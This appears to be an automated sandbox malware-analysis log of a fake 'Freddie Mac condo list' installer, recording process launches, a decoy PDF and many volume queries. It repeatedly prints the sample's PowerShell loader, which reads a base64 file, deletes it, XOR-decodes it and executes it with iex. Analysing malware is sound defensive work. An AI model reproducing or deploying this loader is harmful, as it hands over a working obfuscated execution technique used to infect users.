Source: C:\Users\user\AppData\Local\Temp\is-QP5KN.tmp\Freddie-Mac-Warrantable-Condo-List.tmp	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -command '$c239f13f4fca76f767f4d6fba51f5357='C:\Users\user\ff16164fb7c4dafe1c7dfcf35f3026a6\d2be156f565f9a33407d3b35652b2e6b\ac6140bddaefd4184a2ac9147b8ab988\23f208d5d228a6c8868973e2a59eb750\499c75f14902898da0887c7e00c52a39\7c17c4d25461b0a8b70ac7df296a5b1d\135890c6321e74eb48d13dc7dca30610';$b25f80f9b8486adec377044555c08d58='LQkjiTRCEptIqeJsNVbaHOSKWruPBAGdxYgDUzlXvhwnZcfoFMym';$0f62f3d786a88cbe7974da6f25a19b74=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($c239f13f4fca76f767f4d6fba51f5357));remove-item $c239f13f4fca76f767f4d6fba51f5357;for($i=0;$i -lt $0f62f3d786a88cbe7974da6f25a19b74.count;){for($j=0;$j -lt $b25f80f9b8486adec377044555c08d58.length;$j++){$0f62f3d786a88cbe7974da6f25a19b74[$i]=$0f62f3d786a88cbe7974da6f25a19b74[$i] -bxor $b25f80f9b8486adec377044555c08d58[$j];$i++;if($i -ge $0f62f3d786a88cbe7974da6f25a19b74.count){$j=$b25f80f9b8486adec377044555c08d58.length}}};$0f62f3d786a88cbe7974da6f25a19b74=[System.Text.Encoding]::UTF8.GetString($0f62f3d786a88cbe7974da6f25a19b74);iex $0f62f3d786a88cbe7974da6f25a19b74;'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-QP5KN.tmp\Freddie-Mac-Warrantable-Condo-List.tmp	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -command '$c239f13f4fca76f767f4d6fba51f5357='C:\Users\user\ff16164fb7c4dafe1c7dfcf35f3026a6\d2be156f565f9a33407d3b35652b2e6b\ac6140bddaefd4184a2ac9147b8ab988\23f208d5d228a6c8868973e2a59eb750\499c75f14902898da0887c7e00c52a39\7c17c4d25461b0a8b70ac7df296a5b1d\135890c6321e74eb48d13dc7dca30610';$b25f80f9b8486adec377044555c08d58='LQkjiTRCEptIqeJsNVbaHOSKWruPBAGdxYgDUzlXvhwnZcfoFMym';$0f62f3d786a88cbe7974da6f25a19b74=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($c239f13f4fca76f767f4d6fba51f5357));remove-item $c239f13f4fca76f767f4d6fba51f5357;for($i=0;$i -lt $0f62f3d786a88cbe7974da6f25a19b74.count;){for($j=0;$j -lt $b25f80f9b8486adec377044555c08d58.length;$j++){$0f62f3d786a88cbe7974da6f25a19b74[$i]=$0f62f3d786a88cbe7974da6f25a19b74[$i] -bxor $b25f80f9b8486adec377044555c08d58[$j];$i++;if($i -ge $0f62f3d786a88cbe7974da6f25a19b74.count){$j=$b25f80f9b8486adec377044555c08d58.length}}};$0f62f3d786a88cbe7974da6f25a19b74=[System.Text.Encoding]::UTF8.GetString($0f62f3d786a88cbe7974da6f25a19b74);iex $0f62f3d786a88cbe7974da6f25a19b74;'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-QP5KN.tmp\Freddie-Mac-Warrantable-Condo-List.tmp	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -command '$c239f13f4fca76f767f4d6fba51f5357='C:\Users\user\ff16164fb7c4dafe1c7dfcf35f3026a6\d2be156f565f9a33407d3b35652b2e6b\ac6140bddaefd4184a2ac9147b8ab988\23f208d5d228a6c8868973e2a59eb750\499c75f14902898da0887c7e00c52a39\7c17c4d25461b0a8b70ac7df296a5b1d\135890c6321e74eb48d13dc7dca30610';$b25f80f9b8486adec377044555c08d58='LQkjiTRCEptIqeJsNVbaHOSKWruPBAGdxYgDUzlXvhwnZcfoFMym';$0f62f3d786a88cbe7974da6f25a19b74=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($c239f13f4fca76f767f4d6fba51f5357));remove-item $c239f13f4fca76f767f4d6fba51f5357;for($i=0;$i -lt $0f62f3d786a88cbe7974da6f25a19b74.count;){for($j=0;$j -lt $b25f80f9b8486adec377044555c08d58.length;$j++){$0f62f3d786a88cbe7974da6f25a19b74[$i]=$0f62f3d786a88cbe7974da6f25a19b74[$i] -bxor $b25f80f9b8486adec377044555c08d58[$j];$i++;if($i -ge $0f62f3d786a88cbe7974da6f25a19b74.count){$j=$b25f80f9b8486adec377044555c08d58.length}}};$0f62f3d786a88cbe7974da6f25a19b74=[System.Text.Encoding]::UTF8.GetString($0f62f3d786a88cbe7974da6f25a19b74);iex $0f62f3d786a88cbe7974da6f25a19b74;'	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\is-QP5KN.tmp\Freddie-Mac-Warrantable-Condo-List.tmp

Code function: 5_2_006A60E8 ShellExecuteExW,GetLastError,MsgWaitForMultipleObjects,GetExitCodeProcess,CloseHandle,

5_2_006A60E8

Source: C:\Users\user\AppData\Local\Temp\is-QP5KN.tmp\Freddie-Mac-Warrantable-Condo-List.tmp	Process created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe 'C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe' 'C:\Users\user\AppData\Roaming\9be9c1fdc2ac2d166cecc3e07168fbee.pdf'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-QP5KN.tmp\Freddie-Mac-Warrantable-Condo-List.tmp	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -command '$c239f13f4fca76f767f4d6fba51f5357='C:\Users\user\ff16164fb7c4dafe1c7dfcf35f3026a6\d2be156f565f9a33407d3b35652b2e6b\ac6140bddaefd4184a2ac9147b8ab988\23f208d5d228a6c8868973e2a59eb750\499c75f14902898da0887c7e00c52a39\7c17c4d25461b0a8b70ac7df296a5b1d\135890c6321e74eb48d13dc7dca30610';$b25f80f9b8486adec377044555c08d58='LQkjiTRCEptIqeJsNVbaHOSKWruPBAGdxYgDUzlXvhwnZcfoFMym';$0f62f3d786a88cbe7974da6f25a19b74=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($c239f13f4fca76f767f4d6fba51f5357));remove-item $c239f13f4fca76f767f4d6fba51f5357;for($i=0;$i -lt $0f62f3d786a88cbe7974da6f25a19b74.count;){for($j=0;$j -lt $b25f80f9b8486adec377044555c08d58.length;$j++){$0f62f3d786a88cbe7974da6f25a19b74[$i]=$0f62f3d786a88cbe7974da6f25a19b74[$i] -bxor $b25f80f9b8486adec377044555c08d58[$j];$i++;if($i -ge $0f62f3d786a88cbe7974da6f25a19b74.count){$j=$b25f80f9b8486adec377044555c08d58.length}}};$0f62f3d786a88cbe7974da6f25a19b74=[System.Text.Encoding]::UTF8.GetString($0f62f3d786a88cbe7974da6f25a19b74);iex $0f62f3d786a88cbe7974da6f25a19b74;'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-QP5KN.tmp\Freddie-Mac-Warrantable-Condo-List.tmp	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -command '$c239f13f4fca76f767f4d6fba51f5357='C:\Users\user\ff16164fb7c4dafe1c7dfcf35f3026a6\d2be156f565f9a33407d3b35652b2e6b\ac6140bddaefd4184a2ac9147b8ab988\23f208d5d228a6c8868973e2a59eb750\499c75f14902898da0887c7e00c52a39\7c17c4d25461b0a8b70ac7df296a5b1d\135890c6321e74eb48d13dc7dca30610';$b25f80f9b8486adec377044555c08d58='LQkjiTRCEptIqeJsNVbaHOSKWruPBAGdxYgDUzlXvhwnZcfoFMym';$0f62f3d786a88cbe7974da6f25a19b74=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($c239f13f4fca76f767f4d6fba51f5357));remove-item $c239f13f4fca76f767f4d6fba51f5357;for($i=0;$i -lt $0f62f3d786a88cbe7974da6f25a19b74.count;){for($j=0;$j -lt $b25f80f9b8486adec377044555c08d58.length;$j++){$0f62f3d786a88cbe7974da6f25a19b74[$i]=$0f62f3d786a88cbe7974da6f25a19b74[$i] -bxor $b25f80f9b8486adec377044555c08d58[$j];$i++;if($i -ge $0f62f3d786a88cbe7974da6f25a19b74.count){$j=$b25f80f9b8486adec377044555c08d58.length}}};$0f62f3d786a88cbe7974da6f25a19b74=[System.Text.Encoding]::UTF8.GetString($0f62f3d786a88cbe7974da6f25a19b74);iex $0f62f3d786a88cbe7974da6f25a19b74;'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-QP5KN.tmp\Freddie-Mac-Warrantable-Condo-List.tmp	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -command '$c239f13f4fca76f767f4d6fba51f5357='C:\Users\user\ff16164fb7c4dafe1c7dfcf35f3026a6\d2be156f565f9a33407d3b35652b2e6b\ac6140bddaefd4184a2ac9147b8ab988\23f208d5d228a6c8868973e2a59eb750\499c75f14902898da0887c7e00c52a39\7c17c4d25461b0a8b70ac7df296a5b1d\135890c6321e74eb48d13dc7dca30610';$b25f80f9b8486adec377044555c08d58='LQkjiTRCEptIqeJsNVbaHOSKWruPBAGdxYgDUzlXvhwnZcfoFMym';$0f62f3d786a88cbe7974da6f25a19b74=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($c239f13f4fca76f767f4d6fba51f5357));remove-item $c239f13f4fca76f767f4d6fba51f5357;for($i=0;$i -lt $0f62f3d786a88cbe7974da6f25a19b74.count;){for($j=0;$j -lt $b25f80f9b8486adec377044555c08d58.length;$j++){$0f62f3d786a88cbe7974da6f25a19b74[$i]=$0f62f3d786a88cbe7974da6f25a19b74[$i] -bxor $b25f80f9b8486adec377044555c08d58[$j];$i++;if($i -ge $0f62f3d786a88cbe7974da6f25a19b74.count){$j=$b25f80f9b8486adec377044555c08d58.length}}};$0f62f3d786a88cbe7974da6f25a19b74=[System.Text.Encoding]::UTF8.GetString($0f62f3d786a88cbe7974da6f25a19b74);iex $0f62f3d786a88cbe7974da6f25a19b74;'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-QP5KN.tmp\Freddie-Mac-Warrantable-Condo-List.tmp	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -command '$c239f13f4fca76f767f4d6fba51f5357='C:\Users\user\ff16164fb7c4dafe1c7dfcf35f3026a6\d2be156f565f9a33407d3b35652b2e6b\ac6140bddaefd4184a2ac9147b8ab988\23f208d5d228a6c8868973e2a59eb750\499c75f14902898da0887c7e00c52a39\7c17c4d25461b0a8b70ac7df296a5b1d\135890c6321e74eb48d13dc7dca30610';$b25f80f9b8486adec377044555c08d58='LQkjiTRCEptIqeJsNVbaHOSKWruPBAGdxYgDUzlXvhwnZcfoFMym';$0f62f3d786a88cbe7974da6f25a19b74=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($c239f13f4fca76f767f4d6fba51f5357));remove-item $c239f13f4fca76f767f4d6fba51f5357;for($i=0;$i -lt $0f62f3d786a88cbe7974da6f25a19b74.count;){for($j=0;$j -lt $b25f80f9b8486adec377044555c08d58.length;$j++){$0f62f3d786a88cbe7974da6f25a19b74[$i]=$0f62f3d786a88cbe7974da6f25a19b74[$i] -bxor $b25f80f9b8486adec377044555c08d58[$j];$i++;if($i -ge $0f62f3d786a88cbe7974da6f25a19b74.count){$j=$b25f80f9b8486adec377044555c08d58.length}}};$0f62f3d786a88cbe7974da6f25a19b74=[System.Text.Encoding]::UTF8.GetString($0f62f3d786a88cbe7974da6f25a19b74);iex $0f62f3d786a88cbe7974da6f25a19b74;'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-QP5KN.tmp\Freddie-Mac-Warrantable-Condo-List.tmp	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -command '$c239f13f4fca76f767f4d6fba51f5357='C:\Users\user\ff16164fb7c4dafe1c7dfcf35f3026a6\d2be156f565f9a33407d3b35652b2e6b\ac6140bddaefd4184a2ac9147b8ab988\23f208d5d228a6c8868973e2a59eb750\499c75f14902898da0887c7e00c52a39\7c17c4d25461b0a8b70ac7df296a5b1d\135890c6321e74eb48d13dc7dca30610';$b25f80f9b8486adec377044555c08d58='LQkjiTRCEptIqeJsNVbaHOSKWruPBAGdxYgDUzlXvhwnZcfoFMym';$0f62f3d786a88cbe7974da6f25a19b74=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($c239f13f4fca76f767f4d6fba51f5357));remove-item $c239f13f4fca76f767f4d6fba51f5357;for($i=0;$i -lt $0f62f3d786a88cbe7974da6f25a19b74.count;){for($j=0;$j -lt $b25f80f9b8486adec377044555c08d58.length;$j++){$0f62f3d786a88cbe7974da6f25a19b74[$i]=$0f62f3d786a88cbe7974da6f25a19b74[$i] -bxor $b25f80f9b8486adec377044555c08d58[$j];$i++;if($i -ge $0f62f3d786a88cbe7974da6f25a19b74.count){$j=$b25f80f9b8486adec377044555c08d58.length}}};$0f62f3d786a88cbe7974da6f25a19b74=[System.Text.Encoding]::UTF8.GetString($0f62f3d786a88cbe7974da6f25a19b74);iex $0f62f3d786a88cbe7974da6f25a19b74;'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-QP5KN.tmp\Freddie-Mac-Warrantable-Condo-List.tmp	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -command '$c239f13f4fca76f767f4d6fba51f5357='C:\Users\user\ff16164fb7c4dafe1c7dfcf35f3026a6\d2be156f565f9a33407d3b35652b2e6b\ac6140bddaefd4184a2ac9147b8ab988\23f208d5d228a6c8868973e2a59eb750\499c75f14902898da0887c7e00c52a39\7c17c4d25461b0a8b70ac7df296a5b1d\135890c6321e74eb48d13dc7dca30610';$b25f80f9b8486adec377044555c08d58='LQkjiTRCEptIqeJsNVbaHOSKWruPBAGdxYgDUzlXvhwnZcfoFMym';$0f62f3d786a88cbe7974da6f25a19b74=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($c239f13f4fca76f767f4d6fba51f5357));remove-item $c239f13f4fca76f767f4d6fba51f5357;for($i=0;$i -lt $0f62f3d786a88cbe7974da6f25a19b74.count;){for($j=0;$j -lt $b25f80f9b8486adec377044555c08d58.length;$j++){$0f62f3d786a88cbe7974da6f25a19b74[$i]=$0f62f3d786a88cbe7974da6f25a19b74[$i] -bxor $b25f80f9b8486adec377044555c08d58[$j];$i++;if($i -ge $0f62f3d786a88cbe7974da6f25a19b74.count){$j=$b25f80f9b8486adec377044555c08d58.length}}};$0f62f3d786a88cbe7974da6f25a19b74=[System.Text.Encoding]::UTF8.GetString($0f62f3d786a88cbe7974da6f25a19b74);iex $0f62f3d786a88cbe7974da6f25a19b74;'	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell

Source: C:\Users\user\AppData\Local\Temp\is-QP5KN.tmp\Freddie-Mac-Warrantable-Condo-List.tmp

Code function: 5_2_005C8B3C InitializeSecurityDescriptor,SetSecurityDescriptorDacl,

5_2_005C8B3C

Source: C:\Users\user\AppData\Local\Temp\is-QP5KN.tmp\Freddie-Mac-Warrantable-Condo-List.tmp

Code function: 5_2_005C7CE0 AllocateAndInitializeSid,GetVersion,GetModuleHandleW,CheckTokenMembership,GetCurrentThread,OpenThreadToken,GetLastError,GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetLastError,GetTokenInformation,EqualSid,CloseHandle,FreeSid,

5_2_005C7CE0

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
